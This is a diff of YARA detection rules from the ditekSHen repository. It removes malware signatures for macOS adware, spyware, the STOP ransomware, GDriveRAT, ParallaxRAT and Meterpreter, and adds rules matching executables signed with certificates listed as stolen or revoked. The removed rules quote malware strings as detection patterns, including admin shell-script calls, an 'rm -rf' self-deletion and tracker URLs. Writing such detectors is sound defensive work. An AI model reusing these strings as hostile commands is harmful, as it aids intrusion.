-		$s4 = "/INEncryptor" ascii
-		$s5 = "/INInstallerFlow" ascii
-		$s6 = "/INConfiguration" ascii
-		$s7 = "/INChromeAndFFSetter" ascii
-		$s8 = "/INSafariSetter" ascii
-		$s9 = "/bin/launchctl" fullword ascii
-		$s10 = "/usr/bin/csrutil" fullword ascii
-		$s11 = "_Tt%cSs%zu%.*s%s" fullword ascii
-		$s12 = "_Tt%c%zu%.*s%zu%.*s%s" fullword ascii
-		$s13 = "/macap/safefinder_Obf/safefinder/" ascii
-		$s14 = "/safefinder.build/Release/macsearch.build/" ascii
+		thumbprint = "5dcbc94a2fdcc151afa8c55f24d0d5124d3b6134"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and 10 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and pe.signatures [ i ] . serial == "28:b6:91:27:27:19:b1:ee" )
 }
-rule DITEKSHEN_MALWARE_Osx_Genieo : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E3B80C0932B52A708477939B0D32186F : FILE
 {
 	meta:
-		description = "Detects LinqurySearch/Genieo adware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ac44eefd-bf1c-5d4b-bcd4-9a5d394ac1d3"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "41525cdd-f65a-5aad-bd99-1cdcf8b11981"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3094-L3112"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6593-L6607"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "951dc8539435a52d9eea00b3fdaf98cf618c03867066819f2f9244165e57c675"
+		logic_hash = "a0a95c20c5c82b460ddef686731d1053181cb5066bbb4f585a4f402f50efe030"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Osx.Trojan.Genieo"
-
-	strings:
-		$s1 = "<key>com.apple.security.get-task-allow</key>" fullword ascii
-		$s2 = "U1QQFXAfCxAfRUNCH1JZXh9" ascii
-		$s3 = "XVFTQ1VRQlNYH" ascii
-		$s4 = "dF9HXlxfUVQQVUJCX0IQHRB" ascii
-		$s5 = "Value:forHTTPHeaderField:" ascii
-		$s6 = "postContent:::" fullword ascii
-		$s7 = "postLog:" fullword ascii
-		$s8 = "initWithBase64EncodedString:options:" fullword ascii
-		$s9 = "do shell script \"%@\" with administrator privileges" fullword ascii
-		$s10 = /LinqurySearch-[a-f0-9]{40,}/
+		thumbprint = "1d2b5d4f0de1d7ce4abf82fdc58adc43bc28adee"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BISOYETUTU LTD LIMITED" and ( pe.signatures [ i ] . serial == "e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" or pe.signatures [ i ] . serial == "00:e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" ) )
 }
-rule DITEKSHEN_MALWARE_Osx_AMCPCVARK : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C667Ffe3A5B0A5Ae7Cf3A9E41682E91B : FILE
 {
 	meta:
-		description = "Detects OSX TechyUtils/PCVARK adware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1378364b-db10-5194-98f8-5347504a92e6"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "509dcc22-1202-5b6e-a602-6b06c282b28d"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3114-L3139"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6609-L6623"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b18a9f578af98feb5107d9ef85850457ba5921ab58af7b097a815e3af74f05f7"
+		logic_hash = "6d3d0cfb42758f917b003f7979f7123c1789c9e9b4e01b1aebf265a298eac08f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Osx.Adware.AMC-PCVARK-TechyUtils"
-
-	strings:
-		$s1 = "Mac Auto Fixer.app" fullword ascii
-		$s2 = "com.techyutil.macautofixer" fullword ascii
-		$s3 = "com.findApp.findApp" ascii
-		$s4 = "Library/Preferences/%@.plist" fullword ascii
-		$s5 = "Library/%@/%@" fullword ascii
-		$s6 = "Library/Application Support/%@/%@" fullword ascii
-		$s7 = "sleep 3; rm -rf \"%@\"" fullword ascii
-		$s8 = "Silently calling url: %@" ascii
-		$cnc1 = "cloudfront.net/getdetails" ascii
-		$cnc2 = "trk.entiretrack.com/trackerwcfsrv/tracker.svc/trackOffersAccepted/?" ascii
-		$cnc3 = "pxl=%@&x-count=1&utm_source=%@&lpid=0&utm_content=&utm_term=&x-base=&utm_medium=%@&utm_publisher=%@&offerpxl=&x-fetch=1&utm_campaign=@&affiliateid=&x-at=&btnid=" ascii
-		$x1 = "mafsysinfo" fullword ascii
-		$x2 = "MAF4497_MAF4399_MAF2204" ascii
-		$developerid = "Developer ID Application: Rahul Gahlot (RZ74UYT742)" ascii
+		thumbprint = "6b66ba34ff01e0dab6e68ba244d991578a69c4ad"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and ( 6 of ( $s* ) or 2 of ( $cnc* ) or all of ( $x* ) or $developerid )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and ( pe.signatures [ i ] . serial == "c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" or pe.signatures [ i ] . serial == "00:c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" ) )
 }
-rule DITEKSHEN_MALWARE_Osx_Realtimespy : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Sagsanlgs : FILE
 {
 	meta:
-		description = "Detects macOS RealtimeSpy monitoring app"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6485abf3-896c-54cd-ad84-7bd86456e47b"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "b08e46a5-de76-5711-98dc-2144c7bbe66f"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3141-L3166"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6639-L6650"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4ef2e1b8d34962cd3eab23f401b764b38b8332233aa2ae91b218af499d8ab8ff"
+		logic_hash = "3ab10d8605f501f3c4f3a3afa31c5b001e03354846ff1953e7e36ceb9b564bf6"
 		score = 75
-		quality = 57
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Osx.Trojan.RealtimeSpy"
-
-	strings:
-		$x1 = "SPYAGENT4HASHCIPHER" fullword ascii
-		$x2 = ":username:password:acctid:compUser:compName:" ascii
-		$x3 = ":username:password:acctid:compName:" ascii
-		$x4 = "://www.realtime-spy-mac.com/" ascii
-		$x5 = "/Users/spytech/" ascii
-		$x6 = "shell script \"touch /private/var/db/.AccessibilityAPIEnabled\" password \"pwd\" with administrator privileges" ascii
-		$x7 = "Content-Disposition: form-data; name=\"raptor_" ascii
-		$c1 = "_OBJC_CLASS_$_LocationLogger" fullword ascii
-		$c2 = "_OBJC_CLASS_$_MonitoringFunctions" fullword ascii
-		$c3 = "_OBJC_CLASS_$_ProcessLogger" fullword ascii
-		$c4 = "_OBJC_CLASS_$_RealtimeLoggingFunctions" fullword ascii
-		$c5 = "_OBJC_CLASS_$_Realtime_SpyAppDelegate" fullword ascii
-		$c6 = "_OBJC_CLASS_$_ScreenshotLogger" fullword ascii
-		$c7 = "_OBJC_CLASS_$_Uploader" fullword ascii
-		$c8 = "_OBJC_CLASS_$_UsageLogger" fullword ascii
-		$c9 = "_OBJC_CLASS_$_WebsiteLogger" fullword ascii
+		thumbprint = "a6073f35adbdfe26ddc0f647953acc3a9bd33962"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and ( 2 of ( $x* ) or 2 of ( $c* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sagsanlgs" and pe.signatures [ i ] . serial == "00" )
 }
-rule DITEKSHEN_MALWARE_Osx_Maxofferdeal : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00989A33B72A2Aa29E32D0A5E155C53963 : FILE
 {
 	meta:
-		description = "Detects macOS MaxOfferDeal adware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "aec4ab77-7025-5856-99fb-aa7b86413c00"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "59fcdc74-ca44-5d30-b9b0-5e9c7a3b50f3"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3168-L3187"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6668-L6682"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a9788b2049ae7f345760a078b2932e79fe8fc0dd71e0446c213df64480c3e3d6"
+		logic_hash = "f016093cd512bcbf31814ff1619441e476b3988d0670f469f6311eda37ae295d"
 		score = 75
-		quality = 46
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Osx.Adware.MaxOfferDeal"
-
-	strings:
-		$s1 = "clEvE15obfuscated_data" ascii
-		$s2 = "%.*s.%.*s" fullword ascii
-		$s3 = "_Tt%cSs%zu%.*s%s" fullword ascii
-		$s4 = "_Tt%c%zu%.*s%zu%.*s%s" fullword ascii
-		$s5 = "__ZL20tFirefoxProfilesPath" ascii
-		$s6 = "__ZL22tFirefoxSearchFileName" ascii
-		$s7 = "__ZL37tFirefoxDefaultProfileFolderExtension" ascii
-		$s8 = "__ZL21tFirefoxPrefsFileName" ascii
-		$s9 = "__GLOBAL__sub_I_Firefox.mm" ascii
-		$s10 = "add_image_hook_" ascii
-		$s11 = "/Library/Caches/com.apple.xbs/Sources/arclite/arclite-66/source/" fullword ascii
+		thumbprint = "3f53d410d2d959197f4a93d81a898f424941e11f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TAKE CARE SP Z O O" and ( pe.signatures [ i ] . serial == "98:9a:33:b7:2a:2a:a2:9e:32:d0:a5:e1:55:c5:39:63" or pe.signatures [ i ] . serial == "00:98:9a:33:b7:2a:2a:a2:9e:32:d0:a5:e1:55:c5:39:63" ) )
 }
-rule DITEKSHEN_MALWARE_Osx_Windtrail : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B8F726508Cf1D7B7913Bf4Bbd1E5C19C : FILE
 {
 	meta:
-		description = "Detects WindTrail OSX trojan"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "abf7cd20-b37d-5d0a-8f3f-f4e491965713"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "0acaaed9-ba18-56b0-95b9-e05181843129"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3189-L3206"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6684-L6698"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "291f919cb1e8c4b33960dd3f2c842b9efec04852bd5661543e3ee60bc0fc5ba6"
+		logic_hash = "71eb50a47465d69dbdd488c57b3fd9f70a4dd3b0bc086ed14038320928bc947e"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Osx.Trojan.WindTrail"
-
-	strings:
-		$s1 = "m_ComputerName_UserName" fullword ascii
-		$s2 = "m_uploadURL" fullword ascii
-		$s3 = "m_logString" fullword ascii
-		$s4 = "GenrateDeviceName" fullword ascii
-		$s5 = "open -a" fullword ascii
-		$s6 = "AESEncryptFile:toFile:usingPassphrase:error:" fullword ascii
-		$s7 = "scheduledTimerWithTimeInterval:target:selector:userInfo:repeats:" fullword ascii
-		$s8 = "_kLSSharedFileListSessionLoginItems" fullword ascii
-		$developerid = "Developer ID Application: warren portman (95RKE2AA8F)" ascii
+		thumbprint = "0711adcedb225b82dc32c1435ff32d0a1e54911a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and ( all of ( $s* ) or $developerid )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TMerkuri LLC" and ( pe.signatures [ i ] . serial == "b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" or pe.signatures [ i ] . serial == "00:b8:f7:26:50:8c:f1:d7:b7:91:3b:f4:bb:d1:e5:c1:9c" ) )
 }
-rule DITEKSHEN_MALWARE_Osx_Techyutils : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Aa099E64E214D655801Ea38Ad876711 : FILE
 {
 	meta:
-		description = "Detects TechyUtils OSX packages"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "59fd4165-987f-5b68-9341-d78184b25a1c"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "00b9cd1f-e389-51fd-8a08-73334bb0d0ef"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3208-L3224"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6700-L6712"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "071c67cace09dd66233bd4c4dd78c32d0f39f7e38dc06ec62e09fef67762d098"
+		logic_hash = "a4211bc2f3cedb8b135566d4b22251523a3a2bbdb04c1f1c5b1336ae7c198773"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Osx.Trojan.TechyUtils"
-
-	strings:
-		$s1 = "__ZL58__arclite_NSMutableDictionary__" ascii
-		$s2 = "__ZL46__arclite_NSDictionary_" ascii
-		$s3 = "<key>com.apple.security.get-task-allow</key>" fullword ascii
-		$s4 = "/productprice.svc/GetCountryCode" ascii
-		$s5 = "@_pthread_mutex_lock" fullword ascii
-		$s6 = "_mh_execute_header" fullword ascii
-		$s7 = "/Users/prasoon/Documents/" ascii
-		$developerid = "Developer ID Application: Techyutils Software Private Limited (VS9Q8BRRRJ)" ascii
+		thumbprint = "0789b35fd5c2ef8142e6aae3b58fff14e4f13136"
+		hash1 = "9f90e6711618a1eab9147f90bdedd606fd975b785915ae37e50e7d2538682579"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0xfacf and ( all of ( $s* ) or $developerid )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Psiphon Inc." and pe.signatures [ i ] . serial == "0a:a0:99:e6:4e:21:4d:65:58:01:ea:38:ad:87:67:11" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent04 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_54Cc50D147Fa549E3F721C754E4E3A91 : FILE
 {
 	meta:
-		description = "Detects known downloader agent downloading encoded binaries in patches from paste-like websites, most notably hastebin"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d591c591-aecc-557e-85b4-1e2589fbfbf9"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "2007dabd-74c0-5cc7-986c-21fb1df9136a"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3247-L3263"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6714-L6726"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "73e6af7c32d38ec5d1d2bc9f2517860367b46779b53e0faff8885b655561ab01"
+		logic_hash = "367237a9370542a4506fb13683f0a91e4bf5eb871e4b9f62b4cae8316bdf2d9a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.DLAgent04"
-
-	strings:
-		$x1 = "@@@http" ascii wide
-		$s1 = "HttpWebRequest" fullword ascii
-		$s2 = "GetResponseStream" fullword ascii
-		$s3 = "set_FileName" fullword ascii
-		$s4 = "set_UseShellExecute" fullword ascii
-		$s5 = "WebClient" fullword ascii
-		$s6 = "set_CreateNoWindow" fullword ascii
-		$s7 = "DownloadString" fullword ascii
+		thumbprint = "e3143f0df21fced02fe5525b297ed4cd389c66e3"
+		hash1 = "85adf569d259dc53c5099fea6e90ff3a614a406b4308ebdf9f40e8bed151f526"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and #x1 > 1 and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ralink Technology Corporation" and pe.signatures [ i ] . serial == "54:cc:50:d1:47:fa:54:9e:3f:72:1c:75:4e:4e:3a:91" )
 }
-rule DITEKSHEN_MALWARE_Win_Gdriverat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1E508Bb2398808Bc420A5A1F67Ba5D0B : FILE
 {
 	meta:
-		description = "Detects GDriveRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "29e46280-39d1-5d49-ab0d-0a32398b30f0"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "32f79595-6526-5dea-824a-cc073b6a2b5c"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3265-L3284"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6728-L6740"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "134e66d0afc90e7fbab2c9dd034f85eb504903481e12c1ab8d7bab9321da817a"
+		logic_hash = "71b7efab5359408e3897498ce031c8375e2d67bfc8ff15c685df5ac6dd4bb015"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.GDriveRAT"
-
-	strings:
-		$h1 = "https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart" fullword wide
-		$h2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" fullword wide
-		$h3 = "multipart/related; boundary=\"boundary_tag\"" fullword wide
-		$h4 = "https://www.googleapis.com/drive/v3/files" fullword wide
-		$s1 = "move gdrive.exe \"C:\\Users\\" fullword wide
-		$s2 = "file_data" fullword ascii
-		$s3 = "comp_id" fullword ascii
-		$s4 = "file_name" fullword ascii
-		$s5 = "refresh_token" fullword ascii
-		$s6 = "commands" fullword ascii
-		$s7 = "execute" fullword ascii
+		thumbprint = "63a3ca4114aef8d5076ec84ff78d2319d5305e5b"
+		hash1 = "7ff82a6621e0dd7c29c2e6bcd63920f9b58bc254df9479618b912a1e788ff18b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of ( $h* ) and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WakeNet AB" and pe.signatures [ i ] . serial == "1e:50:8b:b2:39:88:08:bc:42:0a:5a:1f:67:ba:5d:0b" )
 }
-rule DITEKSHEN_MALWARE_Win_STOP : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_008B3333D32B2C2A1D33B41Ba5Db9D4D2D : FILE
 {
 	meta:
-		description = "Detects STOP ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e928d917-a9d9-5830-938a-59b62608e84c"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "90947492-2f42-5d90-b635-62a5f7e79ffc"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3286-L3309"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6742-L6757"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "61f7e7c1139c56088b2f58b78ae132ffcfef0f931c15b67ea775b0d5e51d189d"
+		logic_hash = "c15a248dd52e7e888da381fda296cf19c53196ef52c4c4ce74af646d427eccde"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-		snort2_sid = "920113"
-		snort3_sid = "920111"
-		clamav_sig = "MALWARE.Win.Ransomware.STOP"
-
-	strings:
-		$x1 = "C:\\SystemID\\PersonalID.txt" fullword wide
-		$x2 = "/deny *S-1-1-0:(OI)(CI)(DE,DC)" wide
-		$x3 = "e:\\doc\\my work (c++)\\_git\\encryption\\" ascii wide nocase
-		$s1 = "\" --AutoStart" fullword ascii wide
-		$s2 = "--ForNetRes" fullword wide
-		$s3 = "--Admin" fullword wide
-		$s4 = "%username%" fullword wide
-		$s5 = "?pid=" fullword wide
-		$s6 = /&first=(true|false)/ fullword wide
-		$s7 = "delself.bat" ascii
-		$mutex1 = "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}" fullword ascii
-		$mutex2 = "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}" fullword ascii
-		$mutex3 = "{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}" fullword ascii
+		thumbprint = "7ecaa9a507a6672144a82d453413591067fc1d27"
+		hash1 = "5d5684ccef3ce3b6e92405f73794796e131d3cb1424d757828c3fb62f70f6227"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and 1 of ( $mutex* ) ) or ( all of ( $x* ) ) or ( 6 of ( $s* ) and ( 1 of ( $x* ) or 1 of ( $mutex* ) ) ) or ( 9 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOOK CAF\\xC3\\x89" and ( pe.signatures [ i ] . serial == "8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" or pe.signatures [ i ] . serial == "00:8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Parallaxrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_B548765Eebe9468348Af40B9891C1E63 : FILE
 {
 	meta:
-		description = "Detects ParallaxRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e602b28f-ae5d-52af-b1c5-5c41776dd4c5"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "0ee1a31b-6324-5dbd-bd0d-765bc4891415"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3311-L3328"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6759-L6771"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7fd94dee44079b595b906f1687f44b51b8cebabbeb0900563b8d4fcc0e46bdd0"
+		logic_hash = "db8136f63657130bb3fe2527bb597e70bc3d46395aa3137810f4ee4b4de6c6ec"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.ParallaxRAT"
-
-	strings:
-		$s1 = "[Clipboard End]" fullword wide
-		$s2 = "[Ctrl +" fullword wide
-		$s3 = "[Alt +" fullword wide
-		$s4 = "Clipboard Start" wide
-		$s5 = "(Wscript.ScriptFullName)" wide
-		$s6 = "CSDVersion" fullword ascii
-		$s7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" fullword ascii
-		$x1 = { 2e 65 78 65 00 00 84 00 00 4d 5a 90 00 }
-		$x2 = "This program cannot be run in DOS mode" ascii
+		thumbprint = "5987703bc4a3c739f92af8fed1747394880e1a39"
+		hash1 = "501dee454ba470aa09ceceb4c93ab7e9e913729e47fcc184a2e2d675f8234a58"
+		importance = 20
 
 	condition:
-		(( uint16( 0 ) == 0x5a4d and all of ( $s* ) ) or all of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OSIRIS Corporation" and pe.signatures [ i ] . serial == "b5:48:76:5e:eb:e9:46:83:48:af:40:b9:89:1c:1e:63" )
 }
-rule DITEKSHEN_MALWARE_Win_Meterpreter : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4697C7Ddd3E37Fe275Fdc6961A9093E3 : FILE
 {
 	meta:
-		description = "Detects Meterpreter payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d72fef80-d624-5e39-963a-8d7c12eb2d9c"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "9d611fee-cf29-523e-86f7-5c67f0e563a9"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3330-L3343"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6773-L6785"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5226cd7bb2344b822ee94d75f81a523ff701778de97a32ae52c604a4855e960c"
+		logic_hash = "b3de1a753ac7a2f43ae64ee54fc81d92f70c32d4a04398a6dfc9a6ec856d8300"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "PACKET TRANSMIT" fullword ascii
-		$s2 = "PACKET RECEIVE" fullword ascii
-		$s3 = "\\\\%s\\pipe\\%s" fullword ascii wide
-		$s4 = "%04x-%04x:%s" fullword wide
-		$s5 = "server.dll" fullword ascii
+		thumbprint = "ef24ae3635929c371d1427901082be9f76e58d9a"
+		hash1 = "fb3f622cf5557364a0a3abacc3e9acf399b3631bf3630acb8132514c486751e7"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and all of them ) or ( filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xC3\\x89tienne Hill" and pe.signatures [ i ] . serial == "46:97:c7:dd:d3:e3:7f:e2:75:fd:c6:96:1a:90:93:e3" )
 }
-rule DITEKSHEN_MALWARE_Win_Trojan_Expresscms : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_74C94Ef697Dc9783F845D26Dccc1E7Fd : FILE
 {
 	meta:
-		description = "Detects ExpressCMS"
